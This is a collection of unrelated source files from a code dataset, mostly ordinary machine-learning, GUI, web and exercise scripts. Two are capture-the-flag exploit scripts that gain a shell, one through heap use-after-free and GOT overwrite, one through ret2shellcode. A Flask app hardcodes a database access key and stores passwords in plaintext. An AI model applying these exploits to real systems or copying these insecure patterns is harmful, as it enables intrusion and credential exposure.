tf.Session()\n init = tf.global_variables_initializer()\n self.tf_session.run(init)\n\n pbar = tqdm(range(self.num_epochs))\n for i in pbar:\n avg_err = self.one_train_step(v1_input, v2_input)\n self.cost.append(avg_err)\n pbar.set_description('squared reconstruction average batch error: {}'.format(avg_err))\n\n # catch divergence\n if np.isnan(self.cost[-1]) == True:\n raise RuntimeError('Training has diverged - lower learning rate!')\n # early stopping\n if i > 20 and np.mean(self.cost[-20:-10]) - np.mean(self.cost[-10:]) < np.mean(self.cost[-20:]) * 0.01:\n break\n\n return self.cost\n\n def one_train_step(self, v1_input, v2_input):\n \"\"\"run one training step\"\"\"\n\n updates = [self.fweights_v1, self.fweights_v2, self.fweights_h, self.v1_bias, self.v2_bias, self.h_bias]\n err_tot = 0\n for i in range(self.n_batches):\n np.random.shuffle(v1_input)\n np.random.shuffle(v2_input)\n v1_input_list = np.split(v1_input, self.n_batches)\n v2_input_list = np.split(v2_input, self.n_batches)\n\n self.tf_session.run(updates, feed_dict={self.v1_input: v1_input_list[i], self.v2_input: v2_input_list[i]})\n err_tot += self.get_cost(v1_input_list[i],v2_input_list[i])\n return err_tot / (self.batch_size * self.n_batches)\n\n def pcd_k(self):\n \"k-step (persistent) contrastive divergence\"\n\n mcmc_v1, mcmc_v2 = (self.v1_input, self.v2_input)\n\n start_h = self.prop_v1v2_h(self.v1_input, self.v2_input)\n mcmc_h = start_h\n\n for n in range(self.k):\n mcmc_v1, mcmc_h, mcmc_v2 = self.gibbs(mcmc_v1, mcmc_h, mcmc_v2)\n\n self.final_h = mcmc_h\n\n # update fweights_v1\n fw_v1_positive_grad = self.get_delta_products(tf.divide(self.v1_input,self.v1_var), start_h, tf.divide(self.v2_input,self.v2_var),self.fweights_h,self.fweights_v2) / self.batch_size\n fw_v1_negative_grad = self.get_delta_products(tf.divide(mcmc_v1,self.v1_var), mcmc_h, tf.divide(mcmc_v2,self.v2_var),self.fweights_h,self.fweights_v2) / self.batch_size\n self.fweights_v1 = self.fweights_v1.assign_add(self.learning_rate * (fw_v1_positive_grad - fw_v1_negative_grad))\n\n # update fweights_v2\n fw_v2_positive_grad = self.get_delta_products(tf.divide(self.v2_input,self.v2_var), start_h, tf.divide(self.v1_input,self.v1_var),self.fweights_h,self.fweights_v1) / self.batch_size\n fw_v2_negative_grad = self.get_delta_products(tf.divide(mcmc_v2,self.v2_var), mcmc_h, tf.divide(mcmc_v1,self.v1_var),self.fweights_h,self.fweights_v1) / self.batch_size\n self.fweights_v2 = self.fweights_v2.assign_add(self.learning_rate * (fw_v2_positive_grad - fw_v2_negative_grad))\n\n # update fweights_h\n fw_h_positive_grad = self.get_delta_products(start_h, tf.divide(self.v2_input,self.v2_var), tf.divide(self.v1_input,self.v1_var),self.fweights_v2,self.fweights_v1) / self.batch_size\n fw_h_negative_grad = self.get_delta_products(mcmc_h, tf.divide(mcmc_v2,self.v2_var), tf.divide(mcmc_v1,self.v1_var),self.fweights_v2,self.fweights_v1) / self.batch_size\n self.fweights_h = self.fweights_h.assign_add(self.learning_rate * (fw_h_positive_grad - fw_h_negative_grad))\n\n self.v1_bias = self.v1_bias.assign_add(self.learning_rate * tf.reduce_mean(self.v1_input - mcmc_v1, 0,\n keep_dims=True))\n self.v2_bias = self.v2_bias.assign_add(self.learning_rate * tf.reduce_mean(self.v2_input - mcmc_v2, 0,\n keep_dims=True))\n\n self.h_bias = self.h_bias.assign_add(self.learning_rate * tf.reduce_mean(start_h - mcmc_h, 0, keep_dims=True))\n\n\n def get_cost(self, v1_input, v2_input):\n\n return self.tf_session.run(self.compute_err, feed_dict={self.v1_input: v1_input,\n self.v2_input: v2_input})\n\n def reconstruction_error(self):\n \"\"\" The one-step reconstruction cost for both visible layers \"\"\"\n h = self.prop_v1v2_h(self.v1_input, self.v2_input)\n\n v1_err = tf.cast(self.v1_input, tf.float32) - self.sample_v1_given_v2h(self.v2_input, h)\n v1_err = tf.reduce_sum(v1_err * v1_err, [0, 1])\n\n v2_err = tf.cast(self.v2_input, tf.float32) - self.sample_v2_given_v1h(self.v1_input, h)\n v2_err = tf.reduce_sum(v2_err * v2_err, [0, 1])\n\n self.compute_err = v1_err + v2_err\n\n def v2_predict(self,v1_input):\n\n # mean field\n #v2_predictions = self.prop_v1h_v2(v1_inputs, self.h)\n # sample\n v1_input_list = np.split(v1_input, self.n_batches)\n v2_predictions = []\n for i in range(self.n_batches):\n v2_prediction = self.sample_v2_given_v1h(self.v1_input, self.final_h)\n v2_predictions.append(self.tf_session.run(v2_prediction,feed_dict={self.v1_input: v1_input_list[i], self.v2_input: np.zeros([self.batch_size,self.v2_size])}))\n return np.stack(v2_predictions).reshape(-1,self.v2_size)\n\n\ndef main():\n\n n_v1 = 30\n n_v2 = 30\n n_h = 60\n n_samples = 5000\n\n v1s = []\n v2s = []\n\n for n in range(n_samples):\n v1 = generate_v(n_v1, np.arange(n_v1), np.ones(n_v1))\n v1 = v1.astype(np.float32)\n v1s.append(v1)\n\n v2 = generate_v(n_v2, np.arange(n_v2), np.ones(n_v2))\n v2 = v2.astype(np.float32)\n v2s.append(v2)\n\n v1s = np.stack(v1s)\n v2s = np.stack(v1s)\n\n print(v1s.shape[0])\n\n rbm = RBM(name='rbm', v1_size=n_v1, h_size=n_h, v2_size=n_v2\n , n_data = v1s.shape[0], batch_size=100, learning_rate=0.0000001,\n num_epochs=500, n_factors=10)\n errs = rbm.train(v1s, v2s)\n print('getting predictions')\n print('v2s:', v2s[:3])\n v2_predictions = rbm.v2_predict(v1s)\n print('v2 preds:', v2_predictions[:3])\n\n print('preds diff:',(v2_predictions - v2s).mean(axis=0))\n\n rbm.tf_session.close()\n\n\n if rbm.show_err_plt:\n plt.plot(range(len(rbm.cost)), rbm.cost)\n plt.show()\n\nif __name__ == '__main__':\n main()","sub_path":"rbm_3way_fac.py","file_name":"rbm_3way_fac.py","file_ext":"py","file_size_in_byte":11901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"555781203","text":"\"\"\"\nRoutes and views for the flask application.\n\"\"\"\nimport os\n\n##Date and time with flask imports\nfrom datetime import datetime\nfrom flask import Flask, flash, render_template, request, session\n\n#import for mongo\nimport pymongo\nfrom pymongo import MongoClient\n##import from __init__.py\nfrom GainTracker import app\n\n#connection details for mongo\nuri = \"mongodb://gtmongo:W2zjixLxOssYoTcF8EnnfsAO82vE7RJjfp6wHYcoaJPdsWuf0bm1FXxmk1tXAs4SyhYfd30IAOHDyyTcRKVjcw==@gtmongo.documents.azure.com:10250/?ssl=true&ssl_cert_reqs=CERT_NONE\"\nclient = pymongo.MongoClient(uri)\n\n#initial index route, presents login screen\n@app.route('/')\ndef index():\n if 'username' in session:\n return render_template('index.html', title='Home Page', year=datetime.now().year,)\n return render_template('login.html')\n\n#homepage\n@app.route('/home')\ndef home():\n if 'username' in session:\n return render_template('index.html', \n title='Home Page', \n year=datetime.now().year)\n return render_template('login.html')\n\n#contact page\n@app.route('/contact')\ndef contact():\n if 'username' in session:\n return render_template('contact.html',\n title='Contact Me', year=datetime.now().year, \n message='If you want to contact me about anything on this website please do get in touch.')\n return render_template('login.html')\n\n\n#about page\n@app.route('/about')\ndef about():\n if 'username' in session:\n return render_template('about.html',\n title='About',\n year=datetime.now().year,\n message='About GainTracker')\n return render_template('login.html')\n\n\n@app.route('/workouts', methods=['POST','GET'])\ndef workouts():\n if 'username' in session:\n\n db = client.gtmongo.workouts\n\n if request.method == 'POST':\n #adds to the db\n db.insert({'Workout' : request.form['Workout'],'description' : request.form['description'], 'match': session['username']})\n #puts the db in a list\n data=list(db.find({'match': session['username']}))\n\n #renders the workouts template again passing the list parameter for the template\n return render_template('workouts.html',title='Workouts',year=datetime.now().year,message='Your Workouts page.', workoutinfo = data)\n\n if request.method == 'GET':\n #when page is loaded refreshes the template for the workouts\n data=list(db.find({'match': session['username']}))\n\n return render_template('workouts.html',title='Workouts',year=datetime.now().year,message='Your Workouts page.', workoutinfo = data)\n \n return render_template('workouts.html', workoutinfo = data)\n return render_template('login.html')\n\n\n\n@app.route('/meals', methods=['POST','GET'])\ndef meals():\n if 'username' in session:\n\n db = client.gtmongo.meals\n\n if request.method == 'POST':\n #adds to the db\n db.insert({'Meal' : request.form['Meal'],'Ingredients' : request.form['Ingredients'],'Instructions' : request.form['Instructions'],'Calories' : request.form['Calories'], 'match': session['username']})\n #puts the db in a list\n data=list(db.find({'match': session['username']}))\n\n #renders the workouts template again passing the list parameter for the template\n return render_template('meals.html',title='Meal Planner',year=datetime.now().year,message='Your meals.', mealplans = data)\n\n if request.method == 'GET':\n #when page is loaded refreshes the template for the workouts\n data=list(db.find({'match': session['username']}))\n\n return render_template('meals.html',title='Meal Planner',year=datetime.now().year,message='Your Meals.', mealplans = data)\n \n return render_template('meals.html', )\n return render_template('login.html')\n\n\n\n##signup function\n@app.route('/signup', methods=['POST','GET'])\ndef signup():\n\n if request.method == 'POST':\n\n #in users database\n users = client.gtmongo.users\n #if the name exists\n ifexists = users.find_one({'name' : request.form['username']})\n\n #if the username dosent exist\n if ifexists is None:\n #insert username and password\n users.insert({'name' : request.form['username'],'password' : request.form['password']})\n #username saved to the session\n session['username'] = request.form['username']\n #brought to the template for login after signup\n return render_template('login.html',year=datetime.now().year)\n #if the name exists\n return render_template('signup.html',year=datetime.now().year, message='Signup Failed, username already exists')\n\n return render_template('signup.html')\n\n#login function\n@app.route('/login', methods=['POST','GET'])\ndef login():\n users = client.gtmongo.users\n username_login_found = users.find_one({'name' : request.form['username']})\n\n if username_login_found:\n if request.form['password'] == username_login_found['password']:\n\n session['username'] = request.form['username']\n\n return render_template('index.html')\n\n return render_template('login.html',year=datetime.now().year, message='Login Failed, please ensure details are correct')\n\n","sub_path":"GainTracker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"124647730","text":"\"\"\"\nHacer un programa que calcule el precio de una visita al cine con\nuna cantidad indeterminada de asistentes y siguiendo las siguientes\nreglas segun la edad del visitante:\n $0 si es menor de 2 años\n $3 si es menor de 10 años\n $7 si es menor de 20 años\n $10 si es menor de 60 años\n $7 si es mayor o igual que 60\n\"\"\"\n\n# Creamos la factura\nvalor_factura = 0\n\n# Preguntamos hasta que se canse el usuario\nwhile True:\n edad = input(\"Ingrese la edad del visitante\\n\")\n\n # Intentamos convertir la edad\n try:\n edad = int(edad)\n if edad < 2:\n valor_factura += 0\n elif edad < 10:\n valor_factura += 3\n elif edad < 20:\n valor_factura += 7\n elif edad < 60:\n valor_factura += 10\n else:\n valor_factura += 7\n if 'n' == input(\"Desea agregar otro visitante? s/n\\n\").lower():\n break\n except ValueError:\n print('La edad debe ser un número')\n\nprint('El total de su factura es', valor_factura)\n","sub_path":"Semana8/cine.py","file_name":"cine.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"315374722","text":"'''\r\n첫째 줄에는 테스트 케이스의 개수 C가 주어진다.\r\n\r\n둘째 줄부터 각 테스트 케이스마다 학생의 수 \r\nN(1 ≤ N ≤ 1000, N은 정수)이 첫 수로 주어지고, \r\n이어서 N명의 점수가 주어진다. \r\n점수는 0보다 크거나 같고, 100보다 작거나 같은 정수이다.\r\n\r\n각 케이스마다 한 줄씩 평균을 넘는 학생들의 비율을 \r\n반올림하여 소수점 셋째 자리까지 출력한다.\r\n'''\r\nimport sys\r\ntest_case=int(input())\r\n\r\nfor i in range(test_case):\r\n data=list(map(int,sys.stdin.readline().split()))\r\n count=0\r\n average=sum(data[1:])/data[0]\r\n for j in range(1,data[0]+1):\r\n if data[j]>average:\r\n count+=1\r\n answer=round(count/data[0]*100,3)\r\n print(f'{answer:.3f}%' )","sub_path":"평균은_넘겠지.py","file_name":"평균은_넘겠지.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225320083","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(640, 537)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 611, 501))\n self.tabWidget.setStyleSheet(\"\")\n self.tabWidget.setObjectName(\"tabWidget\")\n self.tab_1 = QtWidgets.QWidget()\n self.tab_1.setStyleSheet(\"background:rgb(155, 122, 200)\\n\"\n\"\")\n self.tab_1.setObjectName(\"tab_1\")\n self.tableView = QtWidgets.QTableView(self.tab_1)\n self.tableView.setGeometry(QtCore.QRect(10, 10, 521, 301))\n self.tableView.setObjectName(\"tableView\")\n self.tabWidget.addTab(self.tab_1, \"\")\n self.tab = QtWidgets.QWidget()\n self.tab.setStyleSheet(\"background:orange\")\n self.tab.setObjectName(\"tab\")\n self.tabWidget.addTab(self.tab, \"\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 640, 23))\n self.menubar.setObjectName(\"menubar\")\n self.menu = QtWidgets.QMenu(self.menubar)\n self.menu.setObjectName(\"menu\")\n self.menu_2 = QtWidgets.QMenu(self.menubar)\n self.menu_2.setObjectName(\"menu_2\")\n self.menu_3 = QtWidgets.QMenu(self.menubar)\n self.menu_3.setObjectName(\"menu_3\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.menubar.addAction(self.menu.menuAction())\n self.menubar.addAction(self.menu_2.menuAction())\n self.menubar.addAction(self.menu_3.menuAction())\n\n self.retranslateUi(MainWindow)\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"对讲模块\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_1), _translate(\"MainWindow\", \"设备列表\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate(\"MainWindow\", \"分组码列表\"))\n self.menu.setTitle(_translate(\"MainWindow\", \"设备查看\"))\n self.menu_2.setTitle(_translate(\"MainWindow\", \"分组查看\"))\n self.menu_3.setTitle(_translate(\"MainWindow\", \"主板信息查看\"))\n\n# 作者:Symbian米汤\n# 链接:https://www.jianshu.com/p/7812da75db13\n# 來源:简书\n# 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。","sub_path":"07GUI/08Pyqt5/07Qtableview/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293359071","text":"#!/usr/bin/python\nimport pwn\n\nclass MonkeExploit:\n \"\"\"\n Eats the useless messages returned by the server\n \"\"\"\n def eatmessage(self):\n if self.banana_unlocked:\n self.s.recvuntil(\"3: take banana\\n\")\n else:\n self.s.recvuntil(\"2: inventory\\n\")\n \n def walk(self, direction):\n s = self.s\n s.sendline(\"0\")\n s.recvuntil(\"[n|s|e|w]\\n\")\n s.sendline(direction)\n buf = s.recvline()\n self.eatmessage()\n return buf\n\n def take_banana(self, name):\n # send \"take banana\" option\n s = self.s\n s.sendline(\"3\")\n s.recvuntil(\"like the name to be:\\n\")\n s.sendline(\"%s\" % (len(name) + 2))\n s.recvuntil(\"like to name it:\\n\")\n s.sendline(name)\n self.eatmessage()\n\n def eat_banana(self, item):\n s = self.s\n s.sendline(\"2\")\n s.sendline(\"%d\" % item)\n s.recvuntil(\"rename]:\")\n s.sendline(\"eat\")\n self.eatmessage()\n\n def __init__(self, is_remote=False):\n if not is_remote:\n self.s = pwn.process(\"./monke\")\n self.libc = pwn.ELF(\"/usr/lib/libc.so.6\")\n else:\n self.s = pwn.remote(\"pwn.utctf.live\", 9999)\n self.libc = pwn.ELF(\"libc-2.27.so\")\n self.banana_unlocked = False\n\n # Walk until we have bananas\n print(self.walk(\"s\"))\n self.banana_unlocked = True\n print(self.walk(\"s\"))\n\n # Create a dummy banana\n self.take_banana(\"A\"*0x10)\n\n # Now go to the 4th dimension so we can delete bananas\n self.banana_unlocked = False\n print(self.walk(\"k\"))\n\n # Walk until we find new bananas\n print(self.walk(\"n\"))\n print(self.walk(\"n\"))\n print(self.walk(\"n\"))\n\n # This time we get bananas\n self.banana_unlocked = True\n self.walk(\"n\")\n\n # Trigger the UAF\n self.eat_banana(0)\n self.take_banana(\"A\"*0x10)\n \n # Now try to get a glibc leak\n self.s.sendline(\"2\")\n self.s.sendline(\"0\")\n self.s.recvuntil(\"rename]:\\n\")\n self.s.sendline(\"rename\")\n self.s.recvuntil(\"like to name it:\\n\")\n FGETS_ADDR = 0x602018\n self.s.sendline(pwn.pack(FGETS_ADDR,64) + pwn.pack(0x8, 64))\n self.eatmessage()\n \n self.s.sendline(\"2\")\n print(self.s.recvline())\n print(self.s.recvline())\n glibc_leak = self.s.recvline()[3:-1]\n print(glibc_leak)\n \n glibc_base = pwn.unpack(glibc_leak, len(glibc_leak)*8) - self.libc.symbols['free']\n print(hex(glibc_base))\n SYSTEM_ADDR = glibc_base + self.libc.symbols['system']\n\n # Rename the second banana, which will write into free relro entry\n self.s.sendline(\"1\")\n self.s.recvuntil(\"rename]:\\n\")\n self.s.sendline(\"rename\")\n self.s.recvuntil(\"like to name it:\\n\")\n self.s.sendline(pwn.pack(SYSTEM_ADDR, 48))\n self.eatmessage()\n\n self.take_banana(\"/bin/sh\")\n self.s.sendline(\"2\")\n print(self.s.recvline())\n print(self.s.recvline())\n print(self.s.recvline())\n print(self.s.recvline())\n self.s.sendline(\"2\")\n print(self.s.recvline())\n self.s.sendline(\"eat\")\n self.s.interactive()\ns = MonkeExploit(True)","sub_path":"2021/utctf/pwn/monke/pwn_monke.py","file_name":"pwn_monke.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129760405","text":"import matplotlib.pyplot as plt\n\nimport numpy as np\n\nb = 5\nprint(b)\na = np.linspace(3, -3, 10)\nx = np.arange(-5, 5, 0.1)\nprint(x)\nfor a1 in a:\n y = a1 * x + b\n plt.plot(x, y, label=f\"y={a1}x+{b:.1f}\")\nplt.legend(loc=2)\nplt.axhline(0, color='black')\nplt.axvline(0, color='black')\nplt.show()\n","sub_path":"demo3_plot_y_ax_b_2.py","file_name":"demo3_plot_y_ax_b_2.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"480079635","text":"class Cliente(Persona):\n def __init__(self, nombre, apellido, dni, direccion, telefono, mail,fechaAlta, fechaBaja, sucursal,numerocu):\n Persona.__init__(self, nombre, apellido, dni, direccion, telefono, mail)\n self.nombre = nombre\n self.apellido = apellido\n self.dni = dni\n self.direccion = direccion\n self.telefono = telefono\n self.mail = mail\n self.fechaAlta = fechaAlta\n self.fechaBaja = fechaBaja\n self.sucursal = sucursal\n self.cuenta = Cuenta(numerocu)\n\n\n def clienteActivo(self): # define si el cliente esta activo o no\n if self.fechaBaja == None: # pegunta si fechaBaja no esta el cliente esta activo\n print(\"Cliente Activo\")\n else:\n print(\"Cliente Inactivo\")\n","sub_path":"ingenieriaDelSoftware/clienteBco.py","file_name":"clienteBco.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532923194","text":"from django.urls import path\nfrom voting import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('signup', views.signup, name='signup'),\n path('login', views.login, name='login'),\n path('logout',views.logout,name='logout'),\n path('adminlogin/', views.adminlogin, name='adminlogin'),\n path('vote/', views.voting, name='voting'),\n path('submit/', views.submit, name='submit'),\n path('thanks/', views.thanks, name='thanks'),\n path('count',views.count,name='count'),\n]\n","sub_path":"backend/voting/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650420242","text":"#coding=utf-8\nimport sys\nsys.path.append(\"..\")\nimport pickle \nimport numpy as np\nimport os\nimport tensorflow as tf\nimport time\nimport scipy.misc\n\n\n\nclass Cifar100DataReader():\n def __init__(self,cifar_folder,batch_size,test_batch_size = 10000,onehot=True, resize=False):\n self.cifar_folder=cifar_folder\n self.onehot=onehot\n self.data_label_train=None # 训练集\n self.data_label_test=None # 测试集\n self.batch_index=0 # 训练数据的batch块索引\n self.test_batch_index=0 # 测试数据的batch_size\n self.batch_size = batch_size\n self.test_batch_size = test_batch_size\n self.resize = resize\n f=os.path.join(self.cifar_folder,\"train\") # 训练集有50000张图>片,100个类,每个类500张\n print ('read: %s'%f )\n fo = open(f, 'rb')\n self.dic_train = pickle.load(fo,encoding='bytes')\n # self.dic_train = pickle.load(fo,encoding='bytes')\n fo.close()\n self.data_label_train=list(zip(self.dic_train[b'data'],self.dic_train[b'fine_labels']) ) #label 0~99 \n np.random.shuffle(self.data_label_train)\n\n\n def dataInfo(self):\n print (self.data_label_train[0:2] )# 每个元素为二元组,第一个是numpy数组大小为32*32*3,第二是label\n print (self.dic_train.keys())\n print (b\"coarse_labels:\",len(self.dic_train[b\"coarse_labels\"]))\n print (b\"filenames:\",len(self.dic_train[b\"filenames\"]))\n print (b\"batch_label:\",len(self.dic_train[b\"batch_label\"]))\n print (b\"fine_labels:\",len(self.dic_train[b\"fine_labels\"]))\n print (b\"data_shape:\",np.shape((self.dic_train[b\"data\"])))\n print (b\"data0:\",type(self.dic_train[b\"data\"][0]))\n\n\n # 得到下一个batch训练集,块大小为100\n def next_train_data(self):\n \"\"\" \n return list of numpy arrays [na,...,na] with specific batch_size \n na: N dimensional numpy array \n \"\"\"\n if self.batch_index\n#\n# Distributed under terms of the MIT license.\n\nfrom pwn import *\n\np = process('./bamboo_ret2shellcode')\n# shellcode = asm(shellcraft.i386.linux.sh())\nshellcode = asm(shellcraft.sh())\nbuf2_addr = 0x804a080\n\np.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))\np.interactive()\n\n","sub_path":"bamboofox/ret2shellcode/solve_bamboo_ret2shellcode.py","file_name":"solve_bamboo_ret2shellcode.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453195088","text":"import random\nimport socket as sock\ndrop = 0 #set to 0 to drop packets and 1 to never drop packets\ndrop_freq = 2 # 1 out of this many packets dropped\nnum_for_handshake = 4 #for this many packets we will never drop\nclass badSocket(sock.socket):\n\tdef __init__(self, *arg):\n\t\tself.AF_INET = sock.AF_INET \n\t\tself.SOCK_DGRAM = sock.SOCK_DGRAM\n\t\tself.num = num_for_handshake\n\t\tsuper(badSocket,self).__init__(*arg)\n\t\tprint('got here')\n\tdef socket(self, *arg):\n\t\treturn badSocket(sock.AF_INET, sock.SOCK_DGRAM)\n\tdef sendto_bad(self, data, addr):\n\t\tself.num -= 1\n\t\tif random.randint(drop,drop_freq) or self.num > 0:\n\t\t\tprint('sending this packet')\n\t\t\treturn super(badSocket, self).sendto(data, addr)\n\t\telse:\n\t\t\tprint('dropping this packet')\n\t\t\treturn len(data)\n\tdef send_bad(self, data):\n\t\tself.num -= 1\n\t\tif random.randint(drop,drop_freq) or self.num > 0:\n\t\t\tprint('sending this packet')\n\t\t\treturn super(badSocket, self).send(data)\n\t\telse:\n\t\t\tprint('dropping this packet')\n\t\t\treturn len(data)\n\tdef sendall_bad(self, data):\n\t\treturn self.send_bad(data)\ndef socket(self, *arg):\n\treturn badSocket(sock.AF_INET, sock.SOCK_DGRAM)\nAF_INET = sock.AF_INET \nSOCK_DGRAM = sock.SOCK_DGRAM\nerror = sock.error\ntimeout = sock.timeout\n","sub_path":"Project2/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228328398","text":"import cv2\nimport numpy as np\nfrom PIL import Image\n\n\nclass FaceReconstructor(object):\n \"\"\"\n Inverts the extraction steps of the FaceExtractor\n 0. Sharpen image, if option is selected\n 1. Invert fine cropping of the ROI\n 2. Invert alignment of eyes\n 3. Invert masking of background\n 4. Invert coarse cropping of the ROI\n \"\"\"\n\n def __init__(self, mask_factor=-10, postprocessing='blur'):\n \"\"\"\n :param mask_factor: Increase or decrease region to insert\n :param postprocessing: Enable sharpening or blurring\n * None: No postprocessing\n * 'blur': blur image\n * 'sharp': sharpen image\n \"\"\"\n self.postprocessing = postprocessing\n if self.postprocessing == 'sharp':\n self.face_sharpener = FaceSharpener()\n if self.postprocessing == 'blur':\n self.face_blurer = FaceBlurer()\n self.face_decropper_fine = FaceDecropperFine()\n self.face_dealigner = FaceDealigner()\n self.face_demasker = FaceDemasker(mask_factor)\n self.face_decropper_coarse = FaceDecropperCoarse()\n\n def __call__(self, processed_image, extraction_information):\n \"\"\"\n :param processed_image: PIL image\n :param extraction_information: namedtuple with the following elements\n * image_original: The original scene (PIL image)\n * image_cropped: The cropped region from the original image (PIL image)\n * bounding_box_coarse: Namedtuple with the coordinates of the cropped ROI\n in the original image\n * offsets_coarse: index shift to pad image and prevent indices out of image\n * size_coarse: size (quadratic) of the coarse cropped image\n * mask: Mask applied to filter background\n * rotation: Namedtuple with rotation and rotation center to align eyes\n * bounding_box_fine: Namedtuple with the coordinates of the fine cropped\n ROI in the coarse cropped region\n * offsets_fine: index shift to pad image and prevent indices out of image\n * size_fine: size (quadratic) of the fine cropped image\n * landmarks: coordinates of facial regions (x,y)\n :return: reconstructed image (PIL image)\n \"\"\"\n # Convert PIL image into np.array\n processed_image = np.array(processed_image)\n original_image = np.array(extraction_information.image_original)\n coarse_cropped_image = np.array(extraction_information.image_cropped)\n\n if self.postprocessing == 'sharp':\n post_processed_image = self.face_sharpener(processed_image)\n elif self.postprocessing == 'blur':\n post_processed_image = self.face_blurer(processed_image)\n else:\n post_processed_image = processed_image\n decropped_image = self.face_decropper_fine(post_processed_image,\n extraction_information.bounding_box_fine,\n extraction_information.offsets_fine,\n extraction_information.size_coarse)\n dealigned_image = self.face_dealigner(decropped_image,\n extraction_information.rotation)\n demasked_image = self.face_demasker(dealigned_image,\n coarse_cropped_image,\n extraction_information.mask)\n decropped_image = self.face_decropper_coarse(demasked_image,\n original_image,\n extraction_information.bounding_box_coarse,\n extraction_information.offsets_coarse)\n # Convert np.array into PIL image\n reconstructed_image = Image.fromarray(decropped_image)\n return reconstructed_image\n\n\nclass FaceSharpener(object):\n \"\"\"\n Sharpen the given image\n Sharpening via inverse gaussian filtering on the\n L channel of the image in the CIELab color space\n \"\"\"\n\n def __init__(self, sharp_factor=5):\n \"\"\"\n :param sharp_factor: Sharpening degree\n \"\"\"\n self.sharp_factor = sharp_factor\n\n def __call__(self, image):\n image = cv2.cvtColor(image, cv2.COLOR_RGB2Lab)\n # Extract L channel\n L = image[:, :, 0]\n # Inverse filtering\n L_blur = cv2.GaussianBlur(L, (0, 0), self.sharp_factor)\n L_sharp = cv2.addWeighted(L_blur, -1, L, 2, 0)\n # Substitute L channel with sharpened L channel\n image[:, :, 0] = L_sharp\n image = cv2.cvtColor(image, cv2.COLOR_Lab2RGB)\n\n return image\n\n\nclass FaceBlurer(object):\n \"\"\"\n Blur the given image\n Blur via gaussian filtering on the\n L channel of the image in the CIELab color space\n \"\"\"\n\n def __init__(self, blur_factor=1.5):\n \"\"\"\n :param blur_factor: Blurring degree\n \"\"\"\n self.blur_factor = blur_factor\n\n def __call__(self, image):\n image = cv2.cvtColor(image, cv2.COLOR_RGB2Lab)\n # Extract L channel\n L = image[:, :, 0]\n # Gaussian blurring\n L_blur = cv2.GaussianBlur(L, (0, 0), self.blur_factor)\n # Substitute L channel with blurred L channel\n image[:, :, 0] = L_blur\n image = cv2.cvtColor(image, cv2.COLOR_Lab2RGB)\n\n return image\n\n\nclass FaceDecropperFine(object):\n \"\"\"\n Invert the fine cropping of the aligned and masked image\n \"\"\"\n\n def __call__(self, cropped_image, bounding_box, offsets, size_coarse):\n \"\"\"\n :param cropped_image: The constructed image\n :param bounding_box: named tuple with absolute coordinates of the fine crop\n :param offsets: named tuple with the offsets (padding + image out of range) of the fine\n crop for every bounding box side\n :param size_coarse: size of the coarse cropped image\n :return: The aligned face only coarsely cropped\n \"\"\"\n decropped_image = np.zeros((size_coarse, size_coarse, cropped_image.shape[2]), dtype=np.uint8)\n # Invert the crop\n decropped_image[bounding_box.top:bounding_box.bottom, bounding_box.left:bounding_box.right] = \\\n cropped_image[offsets.top:offsets.bottom, offsets.left:offsets.right]\n return decropped_image\n\n\nclass FaceDealigner(object):\n \"\"\"\n Invert the alignment of the face with the position of the eyes\n \"\"\"\n\n def __call__(self, aligned_image, rotation):\n \"\"\"\n :param aligned_image: The uncropped constructed image\n :param rotation: The rotation applied to align the image\n :return: The constructed image in original pose\n \"\"\"\n H, W = aligned_image.shape[:2]\n R = cv2.getRotationMatrix2D(rotation.center, -rotation.angle, 1.0)\n dealigned_image = cv2.warpAffine(aligned_image, R, (W, H))\n return dealigned_image\n\n\nclass FaceDemasker(object):\n \"\"\"\n Invert the masking of the image\n The mask can be additionally 